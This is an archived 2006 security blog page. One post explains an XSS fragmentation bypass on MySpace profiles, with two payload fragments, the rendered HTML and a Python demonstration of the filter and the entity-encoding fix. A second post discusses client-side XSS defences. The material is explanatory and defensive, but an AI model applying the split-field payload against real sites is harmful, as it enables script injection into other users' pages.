RETURN $ecure;

Security, Technology and Life

Archive for October 2006

XSS Fragmentation and MySpace 0day


kuza55 wrote a very good article on implementing fragmentation attacks with XSS.

At the simplest level, a fragmentation attack is possible when several fragments, each of which is not a security risk by itself and can therefore be allowed through a filter or firewall, are combined once they reach their destination and produce something dangerous.

The actual exploit is putting <body foo=' in the "Music Interests" box of your profile.
Everything between the Music and Film sections then ends up inside the foo attribute. In the Movies section of your interests you put ' onLoad='alert("xss");> and the result looks something like this:

<tr id=MusicRow><td valign="top" align="left" width="100" bgcolor="#b1d0f0"><span class="lightbluetext8">Music</span></td><td id="ProfileMusic" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">Music</span></td><td id='ProfileMusic' width='175' bgcolor='#d5e8fb' style="WORD-WRAP: break-word"><body test='</td></tr>
<script language="JavaScript">highlightInterests("ProfileMusic");</script>
<tr id=MoviesRow><td valign="top" align="left" width="100" bgcolor="#b1d0f0"><span class="lightbluetext8">Movies</span></td><td id="ProfileMovies" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">' onLoad='alert("Salut?");'></body></html></td></tr>
<script language="JavaScript">highlightInterests("ProfileMovies");</script>

As you can see, there is no single quote between the two interest fields, so the browser treats everything up to the quote in the second field as the attribute value and then runs the event handler that the second field supplies. This is a prime example of why you should not do contextual blacklisting, that is, looking for complete HTML tags, proper formatting and so on. If I put a <style> tag in one field and then use the javascript directive later in the page, still inside that style, it will run, but if I use both in the same field, it will be blocked. Instead you should turn many non-alphanumeric characters into their HTML entity equivalents.
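The two-field reassembly and the encoding fix described above, as an added example that is not code from the post or from MySpace: the profile template and the alert payload value are constructed, and Python's HTML tokenizer stands in for the browser's, which treats a quoted attribute value as continuing across the cell boundary just as the post shows.

```python
import re
from html.parser import HTMLParser

# Constructed template standing in for the two profile cells shown in the post
# (simplified; the cell attributes use double quotes, as the real Movies cell did).
TEMPLATE = ('<tr><td id="ProfileMusic">{music}</td></tr>'
            '<tr><td id="ProfileMovies">{movies}</td></tr>')

# The two fragments quoted in the post; neither one is a complete tag on its own.
MUSIC_FRAGMENT = "<body foo='"
MOVIES_FRAGMENT = "' onLoad='alert(1);'>"

COMPLETE_TAG = re.compile(r"<[a-zA-Z][^>]*>")

def contextual_blacklist_allows(field: str) -> bool:
    """The 'look for completed HTML tags' filter the post argues against:
    a field is accepted unless it contains a whole tag by itself."""
    return COMPLETE_TAG.search(field) is None

def encode_non_alnum(field: str) -> str:
    """The post's recommendation: every non-alphanumeric character becomes a
    numeric entity, so a field can never open or close a tag or attribute."""
    return "".join(c if c.isalnum() else f"&#{ord(c)};" for c in field)

def render(music: str, movies: str, sanitize=lambda s: s) -> str:
    """Place both fields into the template after passing each through sanitize."""
    return TEMPLATE.format(music=sanitize(music), movies=sanitize(movies))

class _TagCollector(HTMLParser):
    """Records every start tag with its attributes; quoted attribute values
    are tokenized across '>' the way a browser does."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected_handlers(page: str) -> list:
    """Check the assembled page rather than the fields: return (tag, attribute)
    pairs for every event-handler attribute, which the template never emits."""
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return [(tag, name) for tag, attrs in parser.tags
            for name in attrs if name.startswith("on")]
```

Each fragment passes the per-field blacklist, the assembled page carries a body tag with an onload handler, and the entity-encoded version carries none.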

Live code. Uses Maluc's CSRF of changing your preferred language to French.


Written by Rodney G

10/22/2006 at 1:44 pm

Posted in Uncategorized


Client-Side protection from XSS


Earlier today, on the sla.ckers.org forums, there was mention of virtual machines, anti-phishing toolbars and XSS. This got me thinking about what users could do to protect themselves from phishing and other XSS-induced troubles. Now, a virtual machine may protect you from viruses, but it does nothing for XSS: the cookies of the browser inside the virtual machine are still accessible from within that virtual machine. RSnake mentioned it could prevent Intranet scanning, so perhaps they could be used in a corporate setting. As I said on the forums…

I would browse inside from a virtual machine, but if it’s a virus, I will reformat. If it’s XSS, my info is gone anyways.

But what about other protection? Firefox 2.0 has an anti-phishing feature. How does this work exactly?

Phishing Protection is turned on by default in Firefox 2, and works by checking the sites that you browse to against a list of known phishing sites. This list is automatically downloaded and regularly updated within Firefox 2 when the Phishing Protection feature is enabled. Since phishing attacks can occur very quickly, there’s also an option to check the sites you browse to against an online service such as Google for more up-to-date protection. This enhanced capability can be turned on via the Security preferences pane.

So, basically it checks the domain against a list of known phishing sites. Great, but again, it does nothing against XSS. A site you browse regularly that is vulnerable to XSS will be seen as a non-phishing site because of its domain name (site.com/search/<xss>), but the script will still execute and your information, again, is lost. A great feature against normal phishing attempts, though.

So, perhaps at the browser level? Nope. Not there. The only one even close is Opera: it detects invalid domain characters in the address bar. But they seem to have no interest in expanding the 'feature' to hinder XSS. I suggested it to the MozillaZine community, even with help from RSnake, and they didn't exactly jump on the idea either.

So, it boils down to this simple fact: for now, we are totally dependent on web developers being aware of the security risks and using good development practices.

Written by Rodney G

10/11/2006 at 7:31 pm

Posted in Uncategorized
